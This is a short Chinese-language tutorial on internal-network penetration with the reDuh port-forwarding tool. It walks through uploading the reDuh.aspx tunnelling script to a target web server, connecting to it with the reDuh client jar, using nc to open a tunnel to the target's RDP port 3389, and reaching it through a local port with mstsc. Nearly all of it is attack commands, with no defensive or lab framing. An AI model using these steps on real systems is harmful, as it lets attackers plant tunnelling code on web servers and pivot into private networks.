内网渗透之——reduh端口转发工具使用介绍

1.将reDuhServers\reDuh.aspx上传到网站目录
​​​​​​
2.攻击机使用reDuhClient\dist\reDuhClient.jar连接刚刚上传的reDuh.aspx文件,会在本地生成一个1010端口

java -jar Desktop\reDuh-master\reDuhClient\dist\reDuhClient.jar http://192.168.16.129/reduh.aspx

3.攻击机使用nc连接本地的1010端口

nc.exe -nvv 127.0.0.1 1010

4.nc连接后进行配置端口转发

[createTunnel]6666:127.0.0.1:3389

5.直接连接本机的6666端口即可（mstsc远程，127.0.0.1:6666）